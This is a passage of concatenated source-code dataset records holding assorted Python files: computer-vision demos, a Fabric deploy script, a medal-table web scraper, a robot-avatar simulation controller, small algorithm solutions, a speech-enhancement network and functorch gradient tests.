np.asmatrix(src_img_hull)\n\ndraw_convex_hull(src_img, src_img_hull, src_img_original)\ncv2.waitKey(0)\n\n# Start the camera stream for live facial swapping\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n\n    # Grab the current frame from the camera\n    (grabbed, frame) = camera.read()\n    frame = cv2.flip(frame, 1)\n\n    try:\n\n        # Save a copy of the original shape\n        frame_original = get_face_original(frame, spec=\"color\")\n\n        # Resize the current frame for mapping\n        frame = cv2.resize(frame_original, (96, 96), interpolation = cv2.INTER_AREA)\n        \n        # frame = extract_face(frame)\n        frame_hull = extract_facial_features(frame)\n        frame_hull = np.array(frame_hull)\n        frame_hull = np.asmatrix(frame_hull)\n\n        if (len(frame_hull) > 0):\n            draw_convex_hull(frame, frame_hull, frame_original)\n            print(\"Drawing convex hull...\")\n        else:\n            print(\"No face detected!\")\n\n    except Exception as e:\n        print(str(e))\n\n    # If the 'q' key is pressed, stop the loop\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\ncamera.release()\ncv2.destroyAllWindows()\n\nprint(\"A wild success!\")","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"402244943","text":"\nimport os\n\nfrom fabric.api import cd, run, sudo, local, lcd, env\nfrom fabric.colors import green, red\nfrom fabric.contrib.project import rsync_project\n\nproject_path = \"/go/src/github.com/etowett/gorsch/\"\nlocal_dir = \"{0}{1}\".format(os.getenv(\"HOME\"), project_path)\ninstall_dir = 
\"/apps/gorsch/\"\nenv.use_ssh_config = True\n\n\ndef dev():\n    env.hosts = [\"sms\"]\n\n\ndef xdeploy():\n    \"\"\"Locally sync host and server application code.\"\"\"\n    with lcd(local_dir):\n        local(\"go build -o /tmp/gorsch\")\n    rsync_project('/tmp/gorsch', local_dir='/tmp/gorsch')\n    local('rm /tmp/gorsch')\n    print(red(\"stop gorsch app\"))\n    sudo(\"systemctl stop gorsch\")\n    with cd(install_dir):\n        run('mv /tmp/gorsch .')\n    print(green(\"start service\"))\n    sudo(\"systemctl restart gorsch\")\n    return\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518504729","text":"from selenium import webdriver\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nSW, SH = 1600, 900\r\n\r\nscreen = pygame.display.set_mode((SW, SH))\r\n\r\nBG = pygame.image.load(\"assets/background.png\") \r\n\r\npygame.display.set_caption(\"Olympics\")\r\npygame.display.set_icon(pygame.image.load(\"assets/icon_image.jpg\"))\r\n\r\nloading_font = pygame.font.Font(\"assets/RobotoCondensed-Bold.ttf\", 65)\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument(\"headless\")\r\n\r\nurl = \"https://olympics.com/tokyo-2020/olympic-games/en/results/all-sports/medal-standings.htm\"\r\n\r\nbrowser = webdriver.Chrome(chrome_options=options)\r\nbrowser.get(url)\r\n\r\ncountries = {}\r\n\r\nnames = browser.find_elements_by_class_name(\"playerTag\")\r\ndata = browser.find_elements_by_css_selector(\"td\")\r\n\r\nloading = loading_font.render(f\"Loading...\", True, \"white\")\r\n\r\ndef generate_data():\r\n    global countries, loading\r\n\r\n    for i in range(len(data)):\r\n        if data[i].text != \"\":\r\n            if data[i].text[0].isalpha():\r\n                countries[data[i].text] = {}  # create the entry first so the nested assignments below cannot raise KeyError\r\n                countries[data[i].text][\"gold\"] = data[i+1].text\r\n                countries[data[i].text][\"silver\"] = data[i+2].text\r\n                countries[data[i].text][\"bronze\"] = data[i+3].text\r\n                loading = loading_font.render(f\"Loading {data[i].text}...\", True, \"white\")\r\n                screen.blit(BG, (0, 0))\r\n                loading_rect = loading.get_rect(center=(800, 450))\r\n                screen.blit(loading, loading_rect)\r\n                pygame.display.update()\r\n\r\n    return countries\r\n","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"160542920","text":"from pathlib import Path\r\nfrom typing import List, Union\r\nfrom tdw.tdw_utils import TDWUtils\r\nfrom tdw.output_data import Images\r\nfrom sticky_mitten_avatar.avatars import Arm\r\nfrom sticky_mitten_avatar import StickyMittenAvatarController\r\nfrom sticky_mitten_avatar.util import get_data\r\n\r\n\r\nclass PutObjectInContainer(StickyMittenAvatarController):\r\n    \"\"\"\r\n    1. Create a sticky mitten avatar, a jug, and a container. Add an overhead camera for image capture.\r\n    2. The avatar picks up the jug.\r\n    3. The avatar goes to the container.\r\n    4. 
The avatar puts the jug in the container.\r\n\r\n Save an image per frame.\r\n \"\"\"\r\n\r\n def __init__(self, output_dir: str, port: int = 1071, launch_build: bool = True):\r\n \"\"\"\r\n :param output_dir: The output directory for images.\r\n :param port: The port number.\r\n :param launch_build: If True, automatically launch the build.\r\n \"\"\"\r\n\r\n self.output_dir = Path(output_dir)\r\n if not self.output_dir.exists():\r\n self.output_dir.mkdir(parents=True)\r\n self.output_dir = str(self.output_dir.resolve())\r\n print(f\"Images will be saved to: {self.output_dir}\")\r\n\r\n super().__init__(port=port, launch_build=launch_build)\r\n\r\n # Save images every frame, if possible.\r\n self.frame_count = 0\r\n self.o_id = 0\r\n self.bowl_id = 1\r\n\r\n def communicate(self, commands: Union[dict, List[dict]]) -> List[bytes]:\r\n resp = super().communicate(commands)\r\n\r\n # Save images per frame.\r\n images = get_data(resp=resp, d_type=Images)\r\n if images is not None:\r\n TDWUtils.save_images(images=images,\r\n filename=TDWUtils.zero_padding(self.frame_count, width=4),\r\n output_directory=self.output_dir)\r\n self.frame_count += 1\r\n return resp\r\n\r\n def _get_scene_init_commands(self, scene: str = None, layout: int = None) -> List[dict]:\r\n commands = super()._get_scene_init_commands()\r\n # Add a jug.\r\n self.o_id, jug_commands = self._add_object(\"jug05\",\r\n position={\"x\": -0.2, \"y\": 0, \"z\": 0.285},\r\n scale={\"x\": 0.8, \"y\": 0.8, \"z\": 0.8})\r\n commands.extend(jug_commands)\r\n # Add a container.\r\n bowl_position = {\"x\": 1.2, \"y\": 0, \"z\": 0.25}\r\n self.bowl_id, bowl_commands = self._add_object(\"serving_bowl\",\r\n position=bowl_position,\r\n rotation={\"x\": 0, \"y\": 30, \"z\": 0},\r\n scale={\"x\": 1.3, \"y\": 1, \"z\": 1.3})\r\n commands.extend(bowl_commands)\r\n return commands\r\n\r\n def run(self) -> None:\r\n \"\"\"\r\n Run a single trial. Save images per frame.\r\n \"\"\"\r\n\r\n self.init_scene()\r\n\r\n # Add a third-person camera.\r\n self.add_overhead_camera({\"x\": -0.08, \"y\": 1.25, \"z\": 1.41}, target_object=\"a\", images=\"cam\")\r\n\r\n # Pick up the object.\r\n self.grasp_object(object_id=self.o_id, arm=Arm.left)\r\n # Lift the object up a bit.\r\n self.reach_for_target(target={\"x\": -0.1, \"y\": 0.6, \"z\": 0.32}, arm=Arm.left)\r\n # Go to the bowl.\r\n self.go_to(target=self.bowl_id, move_stopping_threshold=0.3)\r\n self.turn_to(target=self.bowl_id)\r\n # Lift the object up a bit.\r\n self.reach_for_target(target={\"x\": -0.1, \"y\": 0.6, \"z\": 0.5}, arm=Arm.left)\r\n # Drop the object in the container.\r\n self.drop()\r\n for i in range(50):\r\n self.communicate([])\r\n # Stop the build.\r\n self.end()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from argparse import ArgumentParser\r\n parser = ArgumentParser()\r\n parser.add_argument(\"--dir\", default=\"images\", type=str, help=\"Output directory for images.\")\r\n args = parser.parse_args()\r\n\r\n PutObjectInContainer(output_dir=args.dir).run()\r\n","sub_path":"controllers/put_object_in_container.py","file_name":"put_object_in_container.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"577546102","text":"# Copyright @ 2019 Alibaba. 
All rights reserved.\n# Created by ruhuan on 2019.09.09\n\"\"\" python demo usage about MNN API \"\"\"\nfrom __future__ import print_function\nimport numpy as np\nimport MNN\nimport cv2\nimport sys\n\ndef inference():\n \"\"\" inference mobilenet_v1 using a specific picture \"\"\"\n interpreter = MNN.Interpreter(sys.argv[1])\n interpreter.setCacheFile('.tempcache')\n config = {}\n config['precision'] = 'low'\n \n # create session\n runtimeinfo, exists = MNN.Interpreter.createRuntime((config,))\n print(runtimeinfo, exists)\n session = interpreter.createSession(config, runtimeinfo)\n \n # show session info\n print('memory_info: %fMB' % interpreter.getSessionInfo(session, 0))\n print('flops_info: %fM' % interpreter.getSessionInfo(session, 1))\n print('backend_info: %d' % interpreter.getSessionInfo(session, 2))\n \n input_tensor = interpreter.getSessionInput(session)\n interpreter.resizeTensor(input_tensor, (1, 3, 224, 224))\n interpreter.resizeSession(session)\n\n image = cv2.imread(sys.argv[2])\n #cv2 read as bgr format\n image = image[..., ::-1]\n #change to rgb format\n image = cv2.resize(image, (224, 224))\n #resize to mobile_net tensor size\n image = image - (103.94, 116.78, 123.68)\n image = image * (0.017, 0.017, 0.017)\n #preprocess it\n image = image.transpose((2, 0, 1))\n #change numpy data type as np.float32 to match tensor's format\n image = image.astype(np.float32)\n #cv2 read shape is NHWC, Tensor's need is NCHW,transpose it\n tmp_input = MNN.Tensor((1, 3, 224, 224), MNN.Halide_Type_Float,\\\n image, MNN.Tensor_DimensionType_Caffe)\n input_tensor.copyFrom(tmp_input)\n interpreter.runSession(session)\n output_tensor = interpreter.getSessionOutput(session)\n #constuct a tmp tensor and copy/convert in case output_tensor is nc4hw4\n tmp_output = MNN.Tensor((1, 1001), MNN.Halide_Type_Float, np.ones([1, 1001]).astype(np.float32), MNN.Tensor_DimensionType_Caffe)\n output_tensor.copyToHostTensor(tmp_output) \n print(\"expect 983\")\n print(\"output belong to class: {}\".format(np.argmax(tmp_output.getData())))\n\nif __name__ == \"__main__\":\n inference()\n","sub_path":"pymnn/examples/MNNEngineDemo/mobilenet_demo_2.py","file_name":"mobilenet_demo_2.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"273803194","text":"from Bio.Blast import NCBIXML\r\nfrom Bio import SearchIO\r\nimport os\r\norigin = '\\Python33'\r\npath = os.path.join(origin, \"sdsc_rehs_2013\", 'blast_results')\r\nblastpath = os.path.join (path, \"10254.xml\")\r\nblastq_results = SearchIO.parse(blastpath, \"blast-xml\")\r\nblast_results = NCBIXML.parse(open(blastpath))\r\nfor blastq_result in blastq_results:\r\n print (vars(blastq_result))\r\n","sub_path":"biopython_scripts/old code/blast_dictionary.py","file_name":"blast_dictionary.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490956799","text":"import re\n\ntry:\n with open('test_schedule.inc',\"r\",encoding = 'utf-8') as file:\n test_file = file.read()\nexcept FileNotFoundError:\n print('Файл не найден')\n \nprint(test_file)\nprint(\"=======================\")\n\ndef clean_schedule(file):\n del_comment = list(map((lambda x: re.sub(r'--[\\w\\s,()]+','',x)),file.split('\\n')))\n return '\\n'.join(list(filter(lambda x: x, del_comment)))\n\nwihout_comment = 
clean_schedule(test_file)\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243463902","text":"\npositive = open('wordlist/list of positive words.txt', 'r')\nnegative = open(r'wordlist/list of negative words.txt', 'r')\n\np = positive.read().split(',')\nfor i in range(len(p)):\n if p[i][0] == ' ':\n p[i] = p[i][1:]\npositive2 = open('wordlist/positivewords.txt', 'w', encoding='utf-8')\n[positive2.write(word + '\\n') for word in p]\n\nn = negative.read().split(',')\nfor i in range(len(n)):\n if n[i][0] == ' ':\n n[i] = n[i][1:]\nnegative2 = open('wordlist/negativewords.txt', 'w', encoding='utf-8')\n[negative2.write(word + '\\n') for word in n]\n\nprint(p)\n\npositive.close()\npositive2.close()\nnegative.close()\nnegative2.close()\n","sub_path":"Algo Project/wordlistinlines.py","file_name":"wordlistinlines.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"39476699","text":"#!/usr/bin/env python\nimport fileinput\n\ndef plan(line):\n base = ord('A')\n parties = line.split(\" \")\n parties = [int(p) for p in parties]\n output = \"\"\n while not all(p == 0 for p in parties):\n # find the max value\n maxval = max(parties)\n maxParties = [i for i, j in enumerate(parties) if j == maxval]\n if len(maxParties) % 2 == 0:\n # remove two\n parties[maxParties[0]] -= 1\n parties[maxParties[1]] -= 1\n output += chr(base + maxParties[0])\n output += chr(base + maxParties[1])\n else:\n # remove one\n parties[maxParties[0]] -= 1\n output += chr(base + maxParties[0])\n output += \" \"\n return output.strip()\n\ni = 0\nfor line in fileinput.input():\n if i == 0:\n i += 1\n continue\n if i % 2 == 0:\n line = line[0:-1]\n print(\"Case #\" + str(i/2) + \": \" + str(plan(line)))\n i += 1\n","sub_path":"solutions_5753053697277952_0/Python/technicalguy/evacuation.py","file_name":"evacuation.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"651483537","text":"# -*- coding: utf8 -*-\n\"\"\"\nZigZag Level Order Traversal BT\n===============================\n\nGiven a binary tree, return the zigzag level order traversal of its nodes’ values. 
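(The implementation below uses the classic two-stack scheme: drain the
current level from one stack while pushing children onto a second,
flipping the child order each level. For comparison, a level-list
variant, a minimal sketch that assumes the Node class defined below,
does a plain BFS and reverses alternate levels:

    from collections import deque

    def zigzag_levels(root):
        out, q, ltr = [], deque([root] if root else []), True
        while q:
            level = [q.popleft() for _ in range(len(q))]
            out.append([n.data for n in (level if ltr else reversed(level))])
            for n in level:
                q.extend(c for c in (n.left, n.right) if c)
            ltr = not ltr
        return out

Either way, the visiting direction alternates level by level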
(ie, from left to right, then right to left for the next level and alternate between).\n\nExample: \nGiven binary tree\n\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn\n\n[\n [3],\n [20, 9],\n [15, 7]\n]\n\"\"\"\n\nfrom __future__ import print_function\n\n\nclass Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n\ndef zigzag(node):\n if node is None:\n return\n\n s1 = [node]\n s2 = []\n reverse = False\n\n while True:\n n = s1.pop()\n yield n.data\n children = [n.left, n.right]\n if reverse:\n children.reverse()\n for ch in children:\n if ch is not None:\n s2.append(ch)\n if not s1:\n if not s2:\n break\n s1 = s2\n s2 = []\n reverse = not reverse\n\n\n# perfect binary search tree of height 3.\ntree = Node(8, Node(4, Node(2, Node(1), Node(3)), Node(6, Node(5), Node(7))),\n Node(12, Node(10, Node(9), Node(11)), Node(14, Node(13), Node(15))))\nprint(list(zigzag(tree)))\n","sub_path":"InterviewBit/TreeDataStructure/ZigZagLevelOrderTraversalBT.py","file_name":"ZigZagLevelOrderTraversalBT.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315871364","text":"import os\r\nimport face_recognition\r\nimport cv2\r\nfrom Data import *\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n\r\ndef encode_and_store_values(division='SE CMPN A'):\r\n images = os.listdir('Student Images/' + division + \"/\")\r\n\r\n # Opening the text files in w+ mode, so entire text file will be rewritten and if it doesnt exist\r\n # then a new file will be created\r\n input_encoding_file = open('Student Images/' + division + '/' + '#Encodings.txt', 'w+')\r\n input_ids = open('Student Images/' + division + '/' + '#Encoding Id.txt', 'w+')\r\n\r\n # Iterating through the database and writing encoding and id to text files\r\n # images[2:] because the first two files in each folder are the #Encodings.txt & #Encoding Id.txt which we skip\r\n for image in images[2:]:\r\n\r\n ''' \r\n # This block is if we want to store encoding of grayscale images\r\n img_gray = img_new.convert('L')\r\n print(\"Grayscale image created\")\r\n img_gray.save('Gray_Temp.jpg')\r\n current_image = face_recognition.load_image_file('Gray_Temp.jpg')\r\n print(img_gray.mode)\r\n '''\r\n\r\n current_image = face_recognition.load_image_file(\"Student Images/\" + division + \"/\" + image)\r\n current_image_encoded = face_recognition.face_encodings(current_image, None, 15)[0]\r\n # known_face_encodings.append(current_image_encoded)\r\n # known_face_ids.append(image.split('.')[0]) # Adding Roll Numbers to the list\r\n print(image + \" scanned\")\r\n print(image.split('.')[0])\r\n print(current_image_encoded)\r\n\r\n # Converting current encoding to str and separating each element by ' ' and no [] or \\n will be written\r\n input_encoding_file.write(' '.join(map(str, current_image_encoded)))\r\n # After each encoding vector written add a ',' so that we can ez split it later\r\n input_encoding_file.write(',')\r\n # add the roll number to the input_ids text file and add \\n, for splitlines() later\r\n input_ids.write(image.split('.')[0]+'\\n')\r\n input_encoding_file.close()\r\n input_ids.close()\r\n\r\n\r\ndef face_detect_and_recognize(image_paths, lecture_details):\r\n\r\n # Path for folder of known images\r\n images = os.listdir('Student Images/' + lecture_details['year_branch_div'] + \"/\")\r\n\r\n # Converting image to grayscale (works now :D)\r\n '''\r\n img_new = Image.open(img)\r\n img_gray = 
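    (The live code further down persists encodings as plain text: each
    128-dimensional face encoding is written space-separated and
    ','-terminated to #Encodings.txt, with one roll number per line in
    #Encoding Id.txt. A minimal sketch of that round trip; the function
    names and the `path` argument are illustrative:

        import numpy as np

        def save_encodings(path, encodings):
            with open(path, 'w') as f:
                for enc in encodings:
                    f.write(' '.join(map(str, enc)) + ',')

        def load_encodings(path):
            with open(path) as f:
                chunks = f.read().split(',')
            return [np.array(c.split(), dtype='float64')
                    for c in chunks if c.strip()]
    )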
img_new.convert('L')\r\n print(\"Grayscale image created\")\r\n img_gray.save('GrayOut.jpg')\r\n img_gray.show()\r\n print(img_gray.mode)\r\n '''\r\n\r\n # Old filthy way to encode images\r\n # Fill known face encodings and their names in respective lists\r\n '''\r\n for image in images:\r\n current_image = face_recognition.load_image_file(\"Student Images/\"+division+\"/\" + image)\r\n current_image_encoded = face_recognition.face_encodings(current_image, None, 15)[0]\r\n known_face_encodings.append(current_image_encoded)\r\n known_face_id.append(image.split('.')[0]) # Adding Roll Numbers to the list\r\n print(image + \" scanned\")\r\n print(current_image_encoded)\r\n '''\r\n\r\n # New and improved way to read encodings\r\n # Reading from encoding and adding it to known_encodings\r\n\r\n # Initializing lists\r\n known_face_encodings = []\r\n current_encoding = []\r\n known_face_ids = []\r\n matched_ids = []\r\n image_counter = 1\r\n\r\n input_encoding_file = open('Student Images/' + lecture_details['year_branch_div'] + '/' + '#Encodings.txt', 'r')\r\n input_ids = open('Student Images/' + lecture_details['year_branch_div'] + '/' + '#Encoding Id.txt', 'r')\r\n\r\n # Encodings.txt contains the encoding vectors for each image in the database\r\n # Each vector is ended by a ',' which is why we used that split\r\n # Encoding Id.txt contains the roll numbers of the images, one on each line, hence splitlines()\r\n\r\n for encoding, current_id in zip(input_encoding_file.read().split(','), input_ids.read().splitlines()):\r\n # you need to split the current vector into individual elements to be able to add them to the list\r\n # which is why encoding.split() exists\r\n for encoding_value in encoding.split():\r\n current_encoding.append(encoding_value)\r\n print(current_id)\r\n known_face_ids.append(current_id)\r\n\r\n # The PIECE DE RESISTANCE\r\n # Converting the current_encoding list into an np array with each element in it of dtype float64\r\n current_encoding = np.array(current_encoding, dtype='float64')\r\n # print(current_encoding.shape, 'dype: ', current_encoding.dtype)\r\n known_face_encodings.append(current_encoding)\r\n # Resetting the value of the current_encoding to use for the next encoding vector\r\n current_encoding = []\r\n\r\n print(\"Finished compiling database\")\r\n\r\n input_encoding_file.close()\r\n input_ids.close()\r\n\r\n # Perform encoding for each image to check using image_paths which is a list of path of images provided\r\n for img_path in image_paths:\r\n img = Image.open(img_path)\r\n print(\"Image opened\")\r\n img.save('New Image.jpg')\r\n print(\"Image saved\")\r\n image_to_scan = face_recognition.load_image_file('New Image.jpg')\r\n print(\"Imaged loaded\")\r\n\r\n '''\r\n # Converting to grayscale block\r\n img = Image.open(img_path)\r\n print(\"Image opened\")\r\n img_gray = img.convert('L')\r\n img_gray.save('GrayOut.jpg')\r\n print(\"Image saved\")\r\n image_to_scan = face_recognition.load_image_file('GrayOut.jpg')\r\n print(\"Imaged loaded\")\r\n '''\r\n\r\n face_locations = face_recognition.face_locations(image_to_scan)\r\n print(\"Face locations found\")\r\n face_encodings = face_recognition.face_encodings(image_to_scan, face_locations, 15)\r\n print(\"Current image encoded\")\r\n\r\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\r\n # See if the face is a match for the known face(s)\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding, 0.45)\r\n # 0.48 best, 0.47 more accurate, 0.5 gets 
results atleast\r\n print(matches)\r\n name = \"Unknown\"\r\n roll_number = \"Unknown\"\r\n # If a match was found in known_face_encodings, just use the first one.\r\n if True in matches:\r\n first_match_index = matches.index(True)\r\n roll_number = known_face_ids[first_match_index]\r\n name = get_name(roll_number)\r\n print(name)\r\n matched_ids.append(roll_number)\r\n\r\n # Draw rectangle on OG image and not grayscale\r\n # Draw a box around the face\r\n cv2.rectangle(image_to_scan, (left, top), (right + 10, bottom), (0, 0, 255), 2)\r\n\r\n # Draw a label with a name below the face\r\n font = cv2.FONT_HERSHEY_DUPLEX\r\n cv2.putText(image_to_scan, name, (left + 6, bottom - 6), font, 0.8, (255, 255, 255), 1)\r\n\r\n print(\"Recognised all faces\")\r\n\r\n # Convert BGR to RGB\r\n image_to_scan = image_to_scan[:, :, ::-1]\r\n\r\n print(\"About to display\")\r\n\r\n '''\r\n # Resizing the image so that it matches the dimensions of the cv2.imshow() output window\r\n small_image = cv2.resize(image_to_scan, (800, 600))\r\n\r\n # Display image on output screen and save scanned image as Output.jpg\r\n while True:\r\n cv2.imshow('Output', small_image)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n '''\r\n\r\n # Save output of current image to subject directory of class as\r\n # current_date + lecture_time + lecture_type + 1,2,3... .jpg\r\n\r\n path = 'Output Images/' + lecture_details['year_branch_div'] + '/' + lecture_details['subject'] + '/'\r\n if 'time' in lecture_details.keys():\r\n # Replacing : by . because file names cannot have :, but lecture_time has : in it so yeah\r\n lecture_details['time'] = lecture_details['time'].replace(':', '.')\r\n img_name = lecture_details['date'] + ' ' + lecture_details['time'] + ' ' + lecture_details['type'] + ' ' + str(image_counter) + '.jpg'\r\n else:\r\n img_name = lecture_details['date'] + ' ' + lecture_details['type'] + ' ' + str(image_counter) + '.jpg'\r\n print(path + img_name)\r\n # Only save image if a face was detected\r\n if len(matched_ids) > 0 :\r\n cv2.imwrite(path + img_name, image_to_scan)\r\n print(\"Image saved\")\r\n # Saving temporary output so we can use startfile with it\r\n cv2.imwrite('Output.jpg', image_to_scan)\r\n # Display image\r\n os.startfile('Output.jpg')\r\n image_counter += 1\r\n\r\n return matched_ids\r\n\r\n\r\n# face_detect_and_recognize(['New Image.jpg'])\r\n\r\n\r\n# RUN THIS FUCKING FUNCTION ONCE\r\n# THEN COMMENT IT OUT AND EVERYTHING SHOULD WORK FINE\r\n# encode_and_store_values()\r\n","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"312262813","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self, ngf=None, ngh=None, opts=None):\r\n super(Generator, self).__init__()\r\n # 1 x T x 257\r\n self.conv1 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(1, 16, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(16),\r\n nn.ELU(),\r\n )\r\n # 16 x T x 128\r\n self.conv2 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(16, 32, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(32),\r\n nn.ELU(),\r\n )\r\n # 32 x T x 63\r\n self.conv3 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(32, 64, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(64),\r\n nn.ELU(),\r\n )\r\n # 64 x T x 31\r\n self.conv4 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 
0)),\r\n nn.Conv2d(64, 128, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(128),\r\n nn.ELU(),\r\n )\r\n # 128 x T x 15\r\n self.conv5 = nn.Sequential(\r\n nn.ReplicationPad2d((0, 0, 1, 0)),\r\n nn.Conv2d(128, 256, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(256),\r\n nn.ELU(),\r\n )\r\n # 256 x T x 7\r\n # T x 1024\r\n self.lstm = nn.LSTM(7*256, 1024, 2, batch_first=True, bidirectional=False)\r\n self.fc = nn.Sequential(\r\n nn.Linear(1024, 7*256),\r\n nn.BatchNorm1d(7*256),\r\n nn.ELU()\r\n )\r\n # T x 1024\r\n # 256 x T x 4\r\n self.deconv5 = nn.Sequential(\r\n nn.ConvTranspose2d(256*2, 128, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(128),\r\n nn.ELU(),\r\n )\r\n # 128 x T+1 x 9\r\n # 128 x T x 9\r\n self.deconv4 = nn.Sequential(\r\n nn.ConvTranspose2d(128 * 2, 64, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(64),\r\n nn.ELU(),\r\n )\r\n # 64 x T+1 x 19\r\n # 64 x T x 19\r\n self.deconv3 = nn.Sequential(\r\n nn.ConvTranspose2d(64 * 2, 32, (2, 3), (1, 2)),\r\n nn.BatchNorm2d(32),\r\n nn.ELU(),\r\n )\r\n # 32 x T+1 x 39\r\n # 32 x T x 39\r\n self.deconv2 = nn.Sequential(\r\n nn.ConvTranspose2d(32 * 2, 16, (2, 3), (1, 2), output_padding=(0, 1)),\r\n nn.BatchNorm2d(16),\r\n nn.ELU(),\r\n )\r\n # 16 x T+1 x 80\r\n # 16 x T x 80\r\n self.deconv1 = nn.Sequential(\r\n nn.ConvTranspose2d(16 * 2, 1, (2, 3), (1, 2)),\r\n # nn.BatchNorm2d(1),\r\n # nn.Softplus(),\r\n )\r\n # 16 x T+1 x 161\r\n # 16 x T x 161\r\n\r\n def forward(self, input):\r\n x = input.unsqueeze(1)\r\n c1 = self.conv1(x)\r\n c2 = self.conv2(c1)\r\n c3 = self.conv3(c2)\r\n c4 = self.conv4(c3)\r\n c5 = self.conv5(c4)\r\n bb, cc, tt, dd = c5.size()\r\n lstm_in = c5.permute(0, 2, 1, 3).contiguous().view(bb, tt, cc * dd)\r\n h0 = torch.zeros(2, x.size(0), 1024).to(x)\r\n c0 = torch.zeros(2, x.size(0), 1024).to(x)\r\n lstm_out, _ = self.lstm(lstm_in, (h0, c0))\r\n fc_in = lstm_out.contiguous().view(bb*tt, 1024)\r\n fc_out = self.fc(fc_in)\r\n d5 = fc_out.view(bb, tt, cc, dd).contiguous().permute(0, 2, 1, 3)\r\n d4 = self.deconv5(torch.cat([d5, c5], 1))\r\n d4 = d4[:, :, 1:, :]\r\n d3 = self.deconv4(torch.cat([d4, c4], 1))\r\n d3 = d3[:, :, 1:, :]\r\n d2 = self.deconv3(torch.cat([d3, c3], 1))\r\n d2 = d2[:, :, 1:, :]\r\n d1 = self.deconv2(torch.cat([d2, c2], 1))\r\n d1 = d1[:, :, 1:, :]\r\n out = self.deconv1(torch.cat([d1, c1], 1))\r\n out = out[:, :, 1:, :]\r\n return out.squeeze(1)\r\n","sub_path":"models/Tan2018PowCRN_bak.py","file_name":"Tan2018PowCRN_bak.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636648208","text":"# Copyright (c) Facebook, Inc. 
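# (The tests in this file exercise functorch's composable transforms; the
# core contract, checked by test_primitive and test_nesting_simple below,
# is that grad(f) returns a function computing the derivative. A sketch,
# assuming the functorch import that follows:
#
#     x = torch.randn([])
#     assert torch.allclose(grad(torch.sin)(x), torch.cos(x))
#     assert torch.allclose(grad(grad(torch.sin))(x), -torch.sin(x))
# )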
and its affiliates.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom torch.testing._internal.common_utils import TestCase, run_tests\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport textwrap\nimport unittest\nimport warnings\nimport math\nfrom typing import Callable, Type\nfrom torch.testing._internal.common_device_type import instantiate_device_type_tests, \\\n skipCUDAIfNoMagma, onlyCPU\nfrom functools import partial\n\nimport functorch\nfrom functorch import (\n grad, vjp, vmap, jacrev, grad_and_value,\n make_functional, make_functional_with_buffers,\n functional_init, functional_init_with_buffers,\n)\n\n# NB: numpy is a testing dependency!\nimport numpy as np\n\nUSE_TORCHVISION = False\ntry:\n import torchvision\n USE_TORCHVISION = True\nexcept ImportError:\n warnings.warn(\"Couldn't import torchvision. Some of our tests use it, try \"\n \"to install it with commands from pytorch.org, post-fixed with \"\n \"`--no-deps` to avoid overwriting the pytorch installation\",\n UserWarning)\n\n\nclass TestGradTransform(TestCase):\n def test_primitive(self, device):\n x = torch.randn([], device=device)\n result = grad(torch.sin)(x)\n self.assertEqual(result, torch.cos(x))\n\n def test_composite_simple(self, device):\n x = torch.randn(2, 3, 4, device=device)\n result = grad(lambda x: 